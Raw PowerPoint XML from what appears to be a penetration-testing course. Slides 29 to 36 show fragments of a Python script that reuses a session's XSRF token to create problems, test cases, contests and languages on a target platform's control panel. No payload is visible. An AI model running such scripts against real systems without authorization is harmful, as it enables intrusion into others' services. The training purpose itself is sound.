                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/pdf;base64,"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"score"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"123"</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/problems/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creat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"The problem has been successfully added to the library"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Created a test problem!"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Extracting the problem's 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30F01699-E9F0-402B-BFBF-F26D4D2E8FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114068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5D4E54-2FCD-4631-8F5B-5D8474FD674F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB533E91-BA9D-4D65-94ED-DC2B33A66DFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553453" y="3429000"/>
            <a:ext cx="11458073" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:latin typeface="Franklin Gothic Medium" panose="020B0603020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://gitlab.com/omr00t/python-for-pentesters/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:latin typeface="Franklin Gothic Medium" panose="020B06030201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619CD37-A7E6-4980-96B3-D15C84D91112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467226" y="1418783"/>
            <a:ext cx="11458073" cy="187743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Before we start …</a:t>
            </a:r>
          </a:p>
          <a:p>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Slides can be found on following Gitlab repository</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="634731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problem (cont.)</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440120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create_problem</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"The problem has been successfully added to the library"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Created a test problem!"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Extracting the problem's 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/problems"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res.text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start_index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res.find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":problems=</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13</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end_index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res.find</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start_index</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problems = res[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_index:end_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].replace(</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&amp;quot;"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).strip()</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problems_json</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json.loads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(problems)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problem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problems_json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(problem[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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problem_name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 = problem[</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Found problem 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problem_name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Couldn't create a test problem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9F2D4CF7-0CDE-4FA7-824B-6DA9E652E2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1218454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test case for the problem we created</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add_problem_testcase</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problemid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input"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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"anything</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output"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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"anything</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"executtime"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/problems/testcase/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creat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"The test case has been successfully added"</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Test case has been added!"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Couldn't create a testcase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B31A71CF-615C-4675-B42E-9F7A1BC7989E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1940019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create a contest</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440120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create_contest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start_date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datetime.now</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timedelta</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seconds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start_date_str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start_date.strftime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"%Y-%m-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>T%H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:%M:%S"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end_date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start_date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timedelta</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days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end_date_str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end_date.strftime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"%Y-%m-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>T%H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:%M:%S"</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secrets.token_hex</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"name"</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test_contest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startingtime</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start_date_str</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endingtime</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end_date_str</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"private"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"team"</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"time"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"conditions"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"prize"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"profile"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: SAMPLE_IMAGE_BASE64,</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"logo"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: SAMPLE_IMAGE_BASE64</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5C14C505-C4A9-4CFA-A79D-3A61DF3383EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4251895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32929" y="1778388"/>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What’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SAMPLE_IMAGE_BASE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>?</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65472" y="2272683"/>
            <a:ext cx="10137507"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SAMPLE_IMAGE_BASE64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data:image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/jpeg;base64,/9j/4AAQSkZJRgABA"</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"QEASABIAAD/2wBDAP///////////////////////"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wgALCAABAAEBAREA</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"8QAFBABAAAAAAAAAAAAAAAAAAAAAP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aAAgBAQABP</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xA</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3EEFD2DC-85D0-4E9C-A40C-4D083F15069D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4153369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create a contest</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85524" y="2116273"/>
            <a:ext cx="10137507" cy="470898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569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>create_contest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>target_url</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res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.post</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target_url</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controlpanel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/contests/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creat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headers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"X-XSRF-TOKEN"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: unquote(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.cookies</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"XSRF-TOKEN"</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Accept"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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"application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/json"</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</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data_json</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proxies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=PROXIES)</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res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.json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"Contest created successfully"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == res[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"description"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print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 Contest has been created successfully!"</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print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 Extracting the contest's ID.."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res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.get</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target_url</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controlpanel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/contests"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verify</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False</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proxies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=PROXIES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res.text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start_index</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res.find</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":contests=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>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12</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end_index</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res.find</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start_index</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contests = res[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_index:end_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].replace(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;quot;"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>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).strip()</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contests_json</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json.loads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(contests)</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contest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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contests_json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D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(contest[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"name"</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contest_name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contest_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = contest[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"id"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print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 Found contest's ID:"</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contest_id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return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contest_id</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contest_name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else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print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 Contest has not been created :("</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sys.exit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386C06E4-2323-4709-966D-77B9D5935802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3237623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activate the contest we created</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29639" y="2477220"/>
            <a:ext cx="10137507"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activate_contest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"status"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"id"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controlpanel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/contests/active"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"Accept"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"application/json"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"Contest status changed successfully"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Contest has been activated successfully!"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activate the contest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024529E8-95BB-4989-B9C7-A868D9B14407}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3701918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language to the contest we created/activated</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29639" y="2477220"/>
            <a:ext cx="1013750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add_lang_to_contest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lang_id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"language"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lang_id</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contestid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"/competition/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/mange/languages/add"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"Language has been added successfully"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The language has been added </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sucessfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to contest"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add the language to contest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24366093-4CA5-4F29-A675-5C445476FC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
